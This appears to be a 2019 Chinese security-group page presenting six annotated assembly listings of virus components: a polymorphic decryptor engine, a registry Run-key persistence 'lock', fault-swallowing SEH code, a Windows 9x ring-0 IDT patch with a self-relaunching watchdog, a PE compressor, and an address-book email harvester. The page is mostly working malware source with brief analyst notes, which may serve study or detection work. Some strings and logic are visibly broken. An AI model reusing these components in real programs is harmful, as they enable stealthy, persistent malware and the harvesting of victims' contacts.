

          病毒源碼解析之防御分析

          2019-09-06 23:33:18
          1、超級病毒變形引擎

          此段代碼會在DATA段內生成一個解密代碼。

          ;-----------------------------------------------------------------------
          ; Listing 1: polymorphic decryptor generator ("mutation engine").
          ; Syntax: TASM-style (.model flat,STDCALL; `call proc,arg,...` pushes
          ; the arguments right to left).
          ; @@Start assembles a fresh decryptor into the `Encode` area of the
          ; writable .data section from six instruction templates that GetBxCode
          ; picks by step, register and a one-bit variant, patches the key and the
          ; loop displacement into the emitted bytes, then jumps to `DeCode`, which
          ; runs them. Analyst notes: code is executed out of .data, every template
          ; carries a trailing 0CCh separator, and an `int 3` breakpoint is left
          ; in front of the final jump.
          ;-----------------------------------------------------------------------
          .586p
          .model flat,STDCALL
          extrn ExitProcess: proc
          VirusSize=100h ; length in bytes of the body the emitted loop walks; also the counter's start value
          .data

          DecodeMethod dd ? ; bit 0 of RndCode at step 2 (selects the xor/add template); written here, not read in this listing
          DeCode: ; entry of the generated decryptor (sits in .data)
          pushad
          call Encode ; pushes the address of the 11h block below; the emitted code reads it from [esp]
          db 100h dup(11h) ; placeholder body (VirusSize bytes) that the emitted loop transforms in place
          Encode:
          db 100h dup(0cch) ; scratch area that @@Start overwrites with the emitted decryptor
          RndReg0 dd 0 ; register index 0..3 (eax,ebx,ecx,edx) used as the data pointer
          RndReg1 dd 0 ; register index used as the counter; always different from RndReg0
          RndCode dd 0 ; working random value, rotated right by one before each template choice
          RndMima dd 60932561 ; seed; also the key patched into the emitted xor/add immediate

          .code
          @@Start:
          mov eax,RndMima
          ror eax,7
          mov RndCode,eax ; RndCode = ror(RndMima, 7)

          mov eax,RndCode
          mov ecx,eax
          and eax,011b ; RndReg0 = RndCode and 3
          mov RndReg0,eax
          xor ecx,RndMima
          and ecx,011b ; RndReg1 = (RndCode xor RndMima) and 3 ...
          cmp eax,ecx
          jnz short ChooseRegOk
          inc ecx ; ... bumped to the next index (mod 4) when it collides with RndReg0
          and ecx,011b
          ChooseRegOk:
          mov RndReg1,ecx


          mov edi,offset Encode ; edi = emission cursor into the Encode area

          ror RndCode,1
          call GetBxCode,0,RndReg0,RndCode ; step 0: load RndReg0 with the body pointer at [esp]
          mov esi,eax
          ContFillStep0:
          cld
          lodsb
          stosb ; copy the template byte by byte, separator included
          cmp al,0cch
          jnz ContFillStep0
          dec edi ; step back over the copied 0CCh so the next template overwrites it

          ror RndCode,1
          call GetBxCode,1,RndReg1,RndCode ; step 1: load RndReg1 with VirusSize
          mov esi,eax
          ContFillStep1:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep1
          dec edi

          mov ebx,edi ; ebx = address of the loop body (step 2); used below to compute the backward jump

          ror RndCode,1
          call GetBxCode,2,RndReg0,RndCode ; step 2: xor/add dword [RndReg0],imm32 (imm32 is a 12345678h placeholder)
          mov esi,eax
          ContFillStep2:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep2
          dec edi

          mov eax,RndMima
          mov [edi-4],eax ; overwrite the placeholder immediate (last 4 bytes just emitted) with the key
          mov eax,RndCode
          and eax,01
          mov DecodeMethod,eax ; record which step-2 variant (xor or add) was chosen

          ror RndCode,1
          call GetBxCode,3,RndReg0,RndCode ; step 3: RndReg0 += 4
          mov esi,eax
          ContFillStep3:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep3
          dec edi

          ror RndCode,1
          call GetBxCode,4,RndReg1,RndCode ; step 4: RndReg1 -= 4
          mov esi,eax
          ContFillStep4:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep4
          dec edi

          ror RndCode,1
          call GetBxCode,5,RndReg0,RndCode ; step 5: short conditional jump with a rel8 displacement of 0 (`jcc $`)
          mov esi,eax
          ContFillStep5:
          cld
          lodsb
          stosb
          cmp al,0cch
          jnz ContFillStep5
          dec edi

          mov al,0c3h
          mov [edi],al ; append `ret`; it pops the address pushed by `call Encode`, so control falls into the transformed body

          sub ebx,edi
          mov [edi-1],bl ; rel8 = loop start - (address after the jcc): patches the jcc's displacement byte

          int 3; debugger breakpoint left in by the author

          jmp DeCode ; run the freshly emitted decryptor
          ret ; not reached
          ;-----------------------------------------------------------------------
          ; GetBxCode(Step, Reg, Rnd) -> eax = address of an instruction template
          ; The instructions between `call GetBxCodeAddr` and GetBxCodeAddr form a
          ; byte table, not code that runs here: @@Start copies the selected entry.
          ; Every entry ends in `int 3` (0CCh), the separator GetBxCodeAddr counts.
          ; Entry index = ((Step*4 + Reg)*2 + (Rnd and 1)); Reg 0..3 = eax,ebx,
          ; ecx,edx; the low bit of Rnd picks one of two encodings of each entry.
          ;   Step 0: Reg = [esp]            Step 1: Reg = VirusSize
          ;   Step 2: xor/add [Reg],imm32    Step 3: Reg += 4
          ;   Step 4: Reg -= 4               Step 5: jcc $ (rel8 patched by the caller)
          ; Out: eax. The other registers are restored through `uses`; the `ret`s
          ; at the end rely on the assembler expanding `ret` inside a PROC into the
          ; epilogue.
          ;-----------------------------------------------------------------------
          GetBxCode proc uses ebx ecx edx esi edi,Step:dword,Reg:dword,Rnd:dword
          call GetBxCodeAddr ; pushes the table start (Step0_Eax) and skips over the table
          Step0_Eax: ; ---- step 0: Reg = [esp] (variant 0, then variant 1) ----
          mov eax,[esp]
          int 3;
          pop eax
          push eax
          int 3;
          Step0_Ebx:
          pop ebx
          push ebx
          int 3;
          push dword ptr[esp]
          pop ebx
          int 3;
          Step0_Ecx:
          mov ecx,[esp]
          int 3;
          pop ecx
          push ecx
          int 3;
          Step0_Edx:
          mov edx,[esp]
          int 3;
          mov edx,esp
          mov edx,[edx]
          int 3

          Step1_Eax: ; ---- step 1: Reg = VirusSize, built two different ways ----
          mov eax,VirusSize
          int 3
          sub eax,eax
          add ax,VirusSize+3081h ; 3181h - 3081h = VirusSize via 16-bit operations
          sub ax,3081h
          int 3
          Step1_Ebx:
          mov ebx,VirusSize
          int 3;
          xor ebx,ebx
          or bx,VirusSize
          int 3;
          Step1_Ecx:
          sub ecx,ecx
          xor ecx,(VirusSize xor 3181h)
          xor ecx,(3181h)
          int 3;
          mov ecx,0
          and cx,VirusSize ; note: ecx was just zeroed, so this variant leaves ecx = 0
          int 3
          Step1_Edx:
          and edx,0
          xor dx,(VirusSize-0281h)
          add dx,0281h
          int 3;
          xor edx,edx
          sub edx,(0181h-VirusSize)
          sub edx,-0181h
          int 3;

          Setp2_Eax: ; ---- step 2: xor/add dword [Reg],imm32; 12345678h is a placeholder the caller overwrites with the key ("Setp" labels are never referenced) ----
          xor [eax],12345678h
          int 3
          add [eax],12345678h
          int 3
          Setp2_Ebx:
          xor [ebx],12345678h
          int 3;
          add [ebx],12345678h
          int 3;

          Setp2_Ecx:
          xor [ecx],12345678h
          int 3;
          add [ecx],12345678h
          int 3;
          Setp2_Edx:
          xor [edx],12345678h
          int 3;
          add [edx],12345678h
          int 3;
          Step3_Eax: ; ---- step 3: Reg += 4 ----
          add eax,4
          int 3
          inc eax
          inc eax
          inc eax
          inc eax
          int 3;
          Step3_Ebx:
          add ebx,5
          dec ebx
          int 3
          add ebx,2
          add ebx,2
          int 3;
          Step3_Ecx:
          sub ecx,-4
          int 3
          sub ecx,-5
          dec ecx
          int 3;
          Step3_Edx:
          inc edx
          sub edx,-3
          int 3
          add edx,04
          int 3;

          Step4_Eax: ; ---- step 4: Reg -= 4 (the ecx/edx entries use 16-bit arithmetic) ----
          sub eax,4
          int 3
          dec eax
          dec eax
          dec eax
          sub eax,1
          int 3;
          Step4_Ebx:
          dec ebx
          sub ebx,3
          int 3;
          dec ebx
          dec ebx
          sub ebx,2
          int 3;
          Step4_Ecx:
          add cx,123
          sub cx,123+4
          int 3
          sub cx,-4
          dec cx
          sub cx,7
          int 3
          Step4_Edx:
          sub dx,2
          dec dx
          sub dx,1
          int 3
          inc edx
          sub dx,5
          int 3;
          Step5_Eax: ; ---- step 5: 2-byte jcc back to step 2; `$` gives rel8 = 0, patched by the caller. jnz/ja/jg fall through once the step-4 subtraction reaches 0; jnb and jnl are still taken at 0 (CF=0 / SF=OF) and fall through one iteration later ----
          jnz $
          int 3
          ja $
          int 3
          Step5_Ebx:
          jg $
          int 3
          jnb $
          int 3
          Step5_Ecx:
          jnl $
          int 3
          jnz $
          int 3
          Step5_Edx:
          ja $
          int 3
          jg $
          int 3

          GetBxCodeAddr:
          pop esi ; esi = table start (the return address pushed by `call GetBxCodeAddr`)
          mov al,0cch ; separator byte between entries
          mov ecx,Step
          shl ecx,1
          shl ecx,1 ; ecx = Step*4
          add ecx,Reg ; + register index
          shl ecx,1 ; two encodings per (step, register)
          and Rnd,01b
          add ecx,Rnd ; entry index = (Step*4 + Reg)*2 + (Rnd and 1)
          jcxz short GetBxCodeOver ; index 0 is the table start itself
          ContFindCode: ; skip ecx separators
          push ecx
          ContFindCC:
          inc esi
          cmp [esi],al
          jnz ContFindCC
          pop ecx
          loop ContFindCode
          mov eax,esi
          inc eax ; eax = first byte after the last separator skipped
          ret ; expanded by the assembler into the PROC epilogue (restores the `uses` registers)
          GetBxCodeOver:
          mov eax,esi
          ret
          GetBxCode endp


          end @@Start


          2、Windows 9x/2000/xp 鎖定注冊表

          ;-----------------------------------------------------------------------
          ; Listing 2: keeps an autostart registry value in place.
          ; Opens the Run key under HKEY_LOCAL_MACHINE (080000002h), writes
          ; wap32 = wap32.exe there, reads it back once, then starts
          ; RegProtectProc, which rewrites the value after every change to the
          ; key, and sleeps for three minutes so the process stays alive.
          ; Analyst note: a thread parked in RegNotifyChangeKeyValue on the Run key
          ; that re-sets a value on each notification is the observable behaviour
          ; of this "lock".
          ;-----------------------------------------------------------------------
          .586p
          .model flat,STDCALL
          .data

          HKeyStr db 'SOFTWAREMicrosoftWindowsCurrentVersionRun',0 ; NOTE(review): the separators between the path components appear to have been lost when the page was extracted
          ValueName db 'wap32',0 ; value name under the Run key
          PathName db 'wap32.exe',0 ; value data (10 bytes including the terminator)

          .code

          extrn RegOpenKeyA: proc
          extrn RegSetValueExA: proc
          extrn RegCloseKey: proc
          extrn ExitProcess: proc
          extrn RegNotifyChangeKeyValue: proc
          extrn CreateThread: proc
          extrn Sleep: proc
          extrn RegQueryValueExA: proc

          start:
          push eax ; reserve the dword that receives the opened key handle
          call RegOpenKeyA,080000002h,offset HKeyStr,esp ; esp is pushed first, so it still points at the slot above
          pop ebx ; ebx = hKey
          call RegSetValueExA,ebx,offset ValueName,0,01,offset PathName,100h ; type 1 (REG_SZ); cbData = 100h, so the 246 bytes that follow PathName in .data are stored into the value as well

          sub esp,100h ; 100h-byte stack buffer
          mov eax,esp
          push 100h ; cbData in/out slot
          call RegQueryValueExA,ebx,offset ValueName,0,0,eax,esp ; read the value back into the buffer
          pop eax ; returned size (unused)
          add esp,100h ; the buffer is discarded without being looked at

          push eax ; slot for the thread id
          call CreateThread,0,0,offset RegProtectProc,ebx,0,esp ; start the guard thread with hKey as its argument
          pop eax
          call Sleep,1000*60*3 ; 3 minutes; the guard thread works in the meantime
          ret

          ;-----------------------------------------------------------------------
          ; RegProtectProc(hKey): guard thread. Reads the current wap32 value into
          ; a stack buffer, then loops forever: block in RegNotifyChangeKeyValue
          ; until the key changes, write the saved value back. Never returns; ebx,
          ; esi and edi are taken without being preserved, which only works
          ; because the thread never returns to its creator.
          ;-----------------------------------------------------------------------
          RegProtectProc proc hKey:dword
          mov ebx,hKey
          sub esp,100h ; 100h-byte value buffer
          mov edi,esp
          call GetProtectKeyName ; pushes the address of the inline string below
          db 'wap32',0
          GetProtectKeyName:
          pop esi ; esi -> "wap32" (value name, kept position-independent)
          push 100h ; cbData in/out slot
          call RegQueryValueExA,ebx,esi,0,0,edi,esp ; snapshot of the value as currently stored
          pop eax
          WaitRegChangeNotify:
          call RegNotifyChangeKeyValue,ebx,0,4,0,0 ; this key only (0), filter 4 = last-set changes, no event, synchronous: blocks until a change
          call RegSetValueExA,ebx,esi,0,01,edi,100h ; put the snapshot back (type 1, 100h bytes)
          jmp short WaitRegChangeNotify
          RegProtectProc endp

          end start



          3、 Windows 9x/2000 意外處理通用程序


          此段程序可以達到屏蔽程序錯誤的效果

          ;-----------------------------------------------------------------------
          ; Listing 3: "swallow the fault and carry on" via a hand-built SEH frame.
          ; PushErrorProc (in .code) installs a registration record whose handler
          ; resumes execution right after the `call PushErrorProc`, provokes an
          ; access violation, and removes the record again. SetSehFrame,
          ; ClearSehFrame, Exception and GetEspAddr are placed under `.data`, so
          ; the handler runs out of the writable data section. `D` and `cx_Eip`
          ; are presumably defined in wap32.inc (not shown).
          ;-----------------------------------------------------------------------
          include wap32.inc

          .386p
          .model flat,stdcall

          extrn MessageBoxA: proc
          extrn ExitProcess: proc

          .data

          Msg db 'Fuck',0 ; text and caption of the message box shown once the fault has been skipped

          ;-----------------------------------------------------------------------
          ; SetSehFrame: installs an SEH registration record on the stack whose
          ; handler is the `jmp short Exception` below, and remembers the current
          ; esp in the slot owned by GetEspAddr so ClearSehFrame can unwind to it.
          ; In:  ecx = address at which execution resumes after a swallowed fault
          ; Out: eax clobbered (holds the return address; returns via `jmp eax`)
          ; Stack on exit (top first): prev fs:[0], handler address, resume address
          ;-----------------------------------------------------------------------
          SetSehFrame: ; ecx = resume address
          pop eax ; eax = return address; the stack is reshaped below, so return is via jmp eax
          push ecx ; keep the resume address on the stack
          call PushExceptionProc ; pushes the address of the next line, which becomes the record's handler field
          jmp short Exception ; handler entry: hands over to the Exception PROC
          PushExceptionProc:
          push fs:dword ptr[0] ; previous record -> {prev, handler} now sits on the stack
          mov fs:[0],esp ; link it in at the head of the chain
          call GetEspAddr ; edx -> static slot inside GetEspAddr
          push D [edx] ; save the slot's previous contents (nested use)
          mov [edx],esp ; remember this esp for ClearSehFrame
          jmp eax ; back to the caller
          ;-----------------------------------------------------------------------
          ; ClearSehFrame: undoes SetSehFrame. Resets esp to the value SetSehFrame
          ; stored (dropping anything pushed since, including handler frames),
          ; restores the slot and fs:[0], and pops the record.
          ; Out: ecx = resume address saved by SetSehFrame; eax clobbered.
          ;-----------------------------------------------------------------------
          ClearSehFrame:
          pop eax ; eax = return address
          call GetEspAddr
          mov esp,[edx] ; esp = value stored by SetSehFrame
          pop D [edx] ; restore the slot's previous contents
          pop fs:dword ptr[0] ; unlink: previous record becomes the head again
          pop ecx ; discard the handler address pushed by `call PushExceptionProc`
          pop ecx ; ecx = resume address
          jmp eax

          ;-----------------------------------------------------------------------
          ; Exception(pRecord, pFrame, pContext, pDispatch): the SEH handler,
          ; entered through `jmp short Exception` in SetSehFrame.
          ; Sets the faulting context's EIP (pContext, field `cx_Eip` from
          ; wap32.inc) to the `call ClearSehFrame` below and reports "continue
          ; execution" (eax = 0), so the OS resumes there; that call removes the
          ; frame and leaves the resume address in ecx for `jmp ecx`.
          ;-----------------------------------------------------------------------
          Exception proc pRecord,pFrame,pContext,pDispatch
          call PushSehBackProc ; pushes the address of the next line as the new EIP
          call ClearSehFrame ; resumed here by the OS after the handler returned 0
          jmp ecx ; continue at the address the caller of SetSehFrame supplied
          PushSehBackProc:
          pop ecx ; ecx = address of `call ClearSehFrame`
          mov eax,pContext
          mov [eax.cx_Eip],ecx
          xor eax,eax ; ExceptionContinueExecution: skip the faulting instruction
          ret ; NOTE(review): meant to return to the exception dispatcher; this works only if the assembler expands `ret` inside the PROC into the epilogue (`pop ebp` / `ret`), since the PROC prologue's saved ebp is on top of the stack here -- confirm with the assembler used
          Exception endp

          ;-----------------------------------------------------------------------
          ; GetEspAddr: returns edx = address of the `dd ?` slot embedded in the
          ; code stream below (storage for the esp saved by SetSehFrame). The call
          ; pushes the slot's address; PushOffsetEspAddr pops it and returns.
          ;-----------------------------------------------------------------------
          GetEspAddr:
          call PushOffsetEspAddr
          dd ? ; saved-esp slot
          PushOffsetEspAddr:
          pop edx
          ret


          .code

          ;-----------------------------------------------------------------------
          ; Start: demonstrates the frame. PushErrorProc uses its own return
          ; address as the resume point, installs the frame, writes to address 0
          ; (access violation), and execution continues at `call MessageBoxA`.
          ;-----------------------------------------------------------------------
          Start:
          call PushErrorProc ; the return address pushed here becomes the resume point
          call MessageBoxA,0,offset Msg,offset Msg,0 ; reached via `jmp ecx` in Exception once the fault has been swallowed
          ret
          PushErrorProc:
          pop ecx ; ecx = resume address (the `call MessageBoxA` above)
          call SetSehFrame ; install the frame; returns here via `jmp eax`
          mov ds:[0],eax ; deliberate store to address 0: raises the access violation the handler swallows
          call ClearSehFrame ; only reached if the store above does not fault
          ret ; NOTE(review): on that path the return address was already consumed by `pop ecx` (ClearSehFrame leaves the resume address in ecx), so this `ret` would not return into Start -- the demo relies on the fault occurring


          end Start



          4、Windows 9x 下進程不死術

          此段程序首先實現Win9x下注射遠程線程(新技術)
          然后與Win2k下進程不死術一樣了。
          include Win32.inc

          .386p
          .model flat,stdcall

          extrn GetProcAddress: proc
          extrn WinExec: proc
          extrn MessageBoxA: proc
          extrn Sleep: proc
          extrn GetCurrentProcessId: proc
          extrn OpenProcess: proc
          extrn GetCurrentProcess: proc
          extrn WriteProcessMemory: proc
          extrn GetExitCodeProcess: proc

          .data

          ;問題,要Sleep()這樣做使Kernel32有機會更新數據
          ;-----------------------------------------------------------------------
          ; KnlThread(ProcID): watchdog thread body, written to survive being
          ; copied elsewhere (see Start): each API is called through a pointer
          ; slot that sits inline in the code (`call label` / `dd ?` / `pop eax`
          ; yields the slot's address), and FileName is located relative to
          ; GetFileNameAddress.
          ; Flow: OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID); wait until that
          ; process terminates; WinExec(FileName, 1) restarts it.
          ; PROCESS_ALL_ACCESS and FALSE come from Win32.inc (not shown).
          ;-----------------------------------------------------------------------
          KnlThread proc ProcID:dword
          call GetKnlOpenProcess
          KnlOpenProcess dd ? ; slot filled by Start with the address of OpenProcess
          GetKnlOpenProcess:
          pop eax ; eax -> KnlOpenProcess
          call [eax],PROCESS_ALL_ACCESS,FALSE,ProcID ; OpenProcess(...)
          or eax,eax
          jz short ExitProtectProc ; no handle: give up
          mov ebx,eax ; ebx = process handle
          call GetKnlWaitForSingleObject
          KnlWaitForSingleObject dd ? ; slot for WaitForSingleObject
          GetKnlWaitForSingleObject:
          pop eax
          call [eax],ebx,-1h ; WaitForSingleObject(handle, -1): block until the process ends
          call GetFileNameAddress
          GetFileNameAddress:
          pop ecx ; ecx = runtime address of GetFileNameAddress ...
          add ecx,offset FileName-offset GetFileNameAddress ; ... plus the assembly-time distance = runtime address of FileName
          call GetKnlWinExec
          KnlWinExec dd ? ; slot for WinExec
          GetKnlWinExec:
          pop eax
          call [eax],ecx,01 ; WinExec(FileName, 1): relaunch
          ExitProtectProc:
          ret
          KnlThread endp

          FileName db 'c:wap32.exe',0 ; program the watchdog relaunches; NOTE(review): the path separator after the drive letter appears to have been lost in extraction

          KnlOpenProcessStr db 'OpenProcess',0 ; names resolved with GetProcAddress in Start
          KnlWaitForObjectStr db 'WaitForSingleObject',0
          KnlWinExecStr db 'WinExec',0
          KnlSleepStr db 'Sleep',0 ; not referenced in this listing
          KnlCreateKnlThreadStr db 'CreateKernelThread',0 ; looked up by name; not part of the documented Win32 API

          .code

          ;-----------------------------------------------------------------------
          ; Start: resolves OpenProcess, WaitForSingleObject and WinExec with
          ; 0bff70000h as the module handle (the fixed kernel32 base on Windows
          ; 9x) and stores them in the inline slots of KnlThread, copies 100h
          ; bytes into the kernel32 range at 0bff70600h via MoveDataToKnl, and
          ; starts a kernel thread there with this process' id as argument. The
          ; message box keeps the process around; the watchdog relaunches
          ; FileName when it exits.
          ;-----------------------------------------------------------------------
          Start:
          call GetProcAddress,0bff70000h,offset KnlOpenProcessStr
          mov KnlOpenProcess,eax ; fill the slot inside KnlThread
          call GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
          mov KnlWaitForSingleObject,eax
          call GetProcAddress,0bff70000h,offset KnlWinExecStr
          mov KnlWinExec,eax

          call MoveDataToKnl,offset Start,0bff70600h,100h ; NOTE(review): the copy source is `offset Start` (this .code entry), although the position-independent KnlThread and FileName are in .data -- confirm which 100h bytes are intended

          call GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr ; CreateKernelThread, resolved by name
          mov ebx,eax
          call GetCurrentProcessId
          push eax ; slot for the thread id
          call ebx,0,0,0bff70000h+600h,eax,0,esp ; same argument layout as CreateThread: start address = the copied code, parameter = this process id
          pop eax
          call MessageBoxA,0,offset FileName,offset FileName,0 ; blocks until dismissed; presumably the process ends afterwards and the watchdog fires
          ret

          ;-----------------------------------------------------------------------
          ; MoveDataToKnl(Src, Des, nCx): copies nCx bytes from Src to Des with
          ; the CPU at ring 0 -- Windows 9x only, where the IDT is writable from
          ; user mode. The descriptor for vector 3 is temporarily pointed at the
          ; `pushad` below, so the `int 3` in SetIdt03 enters that code at ring 0;
          ; it restores the original descriptor, runs `rep movsb`, and returns
          ; with `iret`. Analyst note: `sidt` followed by stores into the IDT
          ; from a user-mode process is the signature of this technique; on
          ; NT-family systems the IDT is not user-writable and the store faults.
          ; `W` is presumably a `word ptr` shorthand from Win32.inc (not shown).
          ;-----------------------------------------------------------------------
          MoveDataToKnl proc uses ebx esi edi,Src:dword,Des:dword,nCx:dword
          push eax ; room for the 6-byte IDTR image: limit lands at [esp-2], base at [esp]
          sidt [esp-2]
          pop eax ; eax = IDT base
          add eax,3*8 ; eax -> 8-byte gate descriptor for vector 3
          mov ebx,[eax] ; ebx:edx = original descriptor, restored at ring 0 below
          mov edx,[eax+4]
          call SetIdt03 ; pushes the address of `pushad`; SetIdt03 moves it into the gate's offset field
          pushad ; ---- runs at ring 0, entered through the patched gate by `int 3` ----
          mov [eax],ebx ; put the original descriptor back first
          mov [eax+4],edx
          cld
          rep movsb ; esi/edi/ecx were loaded in SetIdt03 before the int 3
          popad
          iret ; back to ring 3, at the `sti` after the int 3
          SetIdt03:
          cli
          pop W[eax] ; low word of the return address -> offset[15:0] of the gate (selector and type bytes untouched)
          pop W[eax+6] ; high word -> offset[31:16]; the return address is now consumed
          mov esi,Src
          mov edi,Des
          mov ecx,nCx
          int 3; enter the patched gate
          sti
          ret ; expanded by the assembler into the PROC epilogue (restores the `uses` registers)
          MoveDataToKnl endp

          end Start


          5、簡單算法,高效率壓縮PE文件

          ;-----------------------------------------------------------------------
          ; Listing 5: run-length encodes zero bytes. Copies pe.exe to pe.zzz
          ; byte by byte; a non-zero byte is written as is, a run of 1..255 zero
          ; bytes is written as the pair 00h,<count>. A run is flushed when it
          ; reaches 0FFh, when a non-zero byte follows, and at end of file. The
          ; input is read one byte per _lread call. (No decoder is given here.)
          ;-----------------------------------------------------------------------
          .586p
          .model flat,STDCALL
          .data

          OldFile db 'pe.exe',0 ; input
          NewFile db 'pe.zzz',0 ; output

          FileData db 0,0 ; 2-byte I/O buffer: [0] = byte just read / literal, [1] = run count
          .code
          extrn _lopen: proc,_lcreat: proc
          extrn _lread: proc,_lwrite: proc
          extrn _lclose: proc
          extrn ExitProcess: proc
          start:
          call _lopen,offset OldFile,0 ; mode 0 = read
          cmp eax,-1
          jz ExitProc ; open failed
          mov esi,eax ; esi = input handle
          call _lcreat,offset NewFile,0 ; attribute 0 = normal file
          cmp eax,-1
          jz CloseOldFile ; create failed
          mov edi,eax ; edi = output handle

          xor ebx,ebx ; ebx = length of the pending zero run
          ReadData:
          call _lread,esi,offset FileData,1 ; one byte
          or eax,eax
          jz short ReadOver ; 0 bytes read: end of file
          movzx eax,FileData
          or eax,eax
          jnz short NoZero
          inc ebx ; zero byte: extend the run
          cmp ebx,0ffh
          jnz short ReadData
          xor eax,eax ; run is full (255): emit the pair 00h,0FFh
          mov ah,bl
          xchg ax,word ptr FileData ; FileData = 00h, count
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          jmp short ReadData
          NoZero:
          or ebx,ebx
          jnz short NoZeroData
          call _lwrite,edi,offset FileData,1 ; non-zero byte, nothing pending: write it raw
          jmp short ReadData
          NoZeroData:
          push eax ; keep the byte while the pending run is flushed
          xor eax,eax
          mov ah,bl
          mov word ptr FileData,ax ; FileData = 00h, count
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          pop eax
          mov FileData,al ; then the byte itself
          call _lwrite,edi,offset FileData,1
          jmp ReadData
          ReadOver:
          or ebx,ebx
          jz short CloseFile
          xor eax,eax ; end of file with a pending run: flush it
          mov ah,bl
          xchg ax,word ptr FileData
          call _lwrite,edi,offset FileData,2
          xor ebx,ebx
          CloseFile:
          call _lclose,edi
          CloseOldFile:
          call _lclose,esi
          ExitProc:
          call ExitProcess,0

          end start

          6、提取Windows地址薄文件(*.WAB)的Email信息

          ;-----------------------------------------------------------------------
          ; Listing 6: walks a Windows Address Book file (My.WAB) and shows each
          ; Unicode name record it finds in a message box. Analyst note: this is
          ; the address-harvesting building block typical of mass-mailing worms;
          ; the file name and the header offsets used (60h, 64h) are the
          ; indicators this listing gives.
          ;-----------------------------------------------------------------------
          .586p
          .model flat,STDCALL
          .data

          MailFile db 'My.WAB',0 ; address book, opened from the current directory

          .code

          extrn _lopen: proc,_lcreat: proc
          extrn _lread: proc,_lwrite: proc
          extrn _llseek: proc
          extrn _lclose: proc
          extrn MessageBoxA: proc
          extrn ExitProcess: proc
          extrn WideCharToMultiByte: proc

          start:
          call _lopen,offset MailFile,0 ; mode 0 = read
          cmp eax,-1
          jz short ExitProc ; open failed
          mov ebx,eax ; ebx = file handle
          sub esp,100h ; 100h-byte stack buffer, reused for the header and for each record
          mov edi,esp
          call _lread,ebx,edi,100h ; file header
          cmp eax,100h
          jnz short CloseFile ; short file
          mov eax,[edi+60h] ; header+60h: file offset of the Unicode name records (as this code reads the WAB layout)
          call _llseek,ebx,eax,0 ; origin 0 = from the start of the file
          mov ecx,[edi+64h] ; header+64h: number of records
          ContWabMail:
          push ecx ; the calls below clobber ecx; keep the loop count on the stack
          call _lread,ebx,edi,44h ; one 44h-byte record (wide-character text)
          cmp eax,44 ; compares with decimal 44, not 44h, and no branch uses the result: a short read is never detected
          sub esp,100h ; conversion buffer
          mov eax,esp
          call WideCharToMultiByte,0,200h,edi,-1,eax,100h,0,0 ; code page 0, flags 200h, NUL-terminated source -> 100h-byte ANSI buffer
          mov eax,esp
          call MessageBoxA,0,eax,eax,0 ; show the converted record as text and caption
          add esp,100h
          pop ecx
          loop short ContWabMail
          CloseFile:
          call _lclose,ebx
          ExitProc:
          call ExitProcess,0

          end start



          WSS(Whitecell Security Systems),一個非營利性民間技術組織,致力于各種系統安全技術的研究。堅持傳統的hacker精神,追求技術的精純。
          WSS 主頁:http://www.whitecell.org/
          WSS 論壇:http://www.whitecell.org/forum/